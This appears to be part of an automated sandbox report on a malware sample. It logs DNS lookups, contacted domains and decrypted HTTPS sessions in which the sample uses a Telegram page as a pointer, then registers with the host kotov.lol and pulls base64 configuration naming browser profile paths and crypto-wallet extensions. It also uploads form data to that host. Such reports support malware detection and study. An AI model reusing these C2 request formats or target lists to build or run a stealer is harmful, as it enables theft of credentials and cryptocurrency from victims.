Nov 29, 2024 12:27:58.671083927 CET	1.1.1.1	192.168.2.8	0x37c3	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.671083927 CET	1.1.1.1	192.168.2.8	0x37c3	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.671921968 CET	1.1.1.1	192.168.2.8	0x8718	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 29, 2024 12:27:58.672152042 CET	1.1.1.1	192.168.2.8	0xccb1	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.672152042 CET	1.1.1.1	192.168.2.8	0xccb1	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.672885895 CET	1.1.1.1	192.168.2.8	0x5848	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 29, 2024 12:27:58.775064945 CET	1.1.1.1	192.168.2.8	0xb222	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.775064945 CET	1.1.1.1	192.168.2.8	0xb222	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:58.775695086 CET	1.1.1.1	192.168.2.8	0x81ee	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 29, 2024 12:27:59.421984911 CET	1.1.1.1	192.168.2.8	0xda45	No error (0)	sb.scorecardresearch.com		18.165.220.66	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.421984911 CET	1.1.1.1	192.168.2.8	0xda45	No error (0)	sb.scorecardresearch.com		18.165.220.106	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.421984911 CET	1.1.1.1	192.168.2.8	0xda45	No error (0)	sb.scorecardresearch.com		18.165.220.57	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.421984911 CET	1.1.1.1	192.168.2.8	0xda45	No error (0)	sb.scorecardresearch.com		18.165.220.110	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:27:59.443186998 CET	1.1.1.1	192.168.2.8	0x239a	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:59.444319010 CET	1.1.1.1	192.168.2.8	0x63b	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:59.566611052 CET	1.1.1.1	192.168.2.8	0x3d0a	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:59.567317963 CET	1.1.1.1	192.168.2.8	0x356d	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:59.715337992 CET	1.1.1.1	192.168.2.8	0x1e94	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:27:59.716089964 CET	1.1.1.1	192.168.2.8	0x1ce7	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:28:00.889858007 CET	1.1.1.1	192.168.2.8	0x94e2	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:28:01.356705904 CET	1.1.1.1	192.168.2.8	0x71f5	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:28:02.407469034 CET	1.1.1.1	192.168.2.8	0x9aae	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2024 12:28:02.407469034 CET	1.1.1.1	192.168.2.8	0x9aae	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

kotov.lol

slscr.update.microsoft.com

www.google.com

fs.microsoft.com

api.edgeoffer.microsoft.com

clients2.googleusercontent.com

chrome.cloudflare-dns.com

edgeassetservice.azureedge.net

data-edge.smartscreen.microsoft.com

https:

sb.scorecardresearch.com

arc.msn.com

browser.events.data.msn.com

img-s-msn-com.akamaized.net

c.msn.com

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	149.154.167.99	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:19 UTC	85	OUT	GET /gv4dlp HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:20 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 29 Nov 2024 11:27:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12292 Connection: close Set-Cookie: stel_ssid=13d2f3f953228eaeb0_6629587533090126902; expires=Sat, 30 Nov 2024 11:27:19 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-11-29 11:27:20 UTC	12292	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 76 34 64 6c 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @gv4dlp</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:22 UTC	224	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:24 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:24 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 34 45 37 38 43 39 42 36 35 32 39 37 30 39 31 31 30 39 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 2d 2d 0d 0a Data Ascii: ------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="hwid"554E78C9B652970911098-a33c7340-61ca------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------HJDAFIEHIEGDHIDGDGHD--
2024-11-29 11:27:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:25 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|edb3f32270e29a8eee0d52d366a329a6\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49709	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:27 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BGIJDGCAEBFIIECAKFHICont
2024-11-29 11:27:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:28 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49710	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:29 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------ECGIIIDAKJDHJKFHIEBFCont
2024-11-29 11:27:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:30 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49711	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:32 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:32 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------GIEHJDHCBAEHJJJKKFIDCont
2024-11-29 11:27:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:33 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49712	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:34 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 6733 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:27:34 UTC	6733	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------IIECFHDBAAECAAKFHDHICont
2024-11-29 11:27:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:27:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-29 11:27:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49713	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:35 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ollo6842okoMZC9&MD=Sx6+nVES HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-29 11:27:36 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 9e67567e-46a1-432b-a430-c347e2d8db35 MS-RequestId: bec0126c-7d1f-4a53-af27-9fddff6b0c8c MS-CV: F3EaOvcrxUegv5xY.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 29 Nov 2024 11:27:35 GMT Connection: close Content-Length: 24490
2024-11-29 11:27:36 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-29 11:27:36 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49714	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:27:35 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
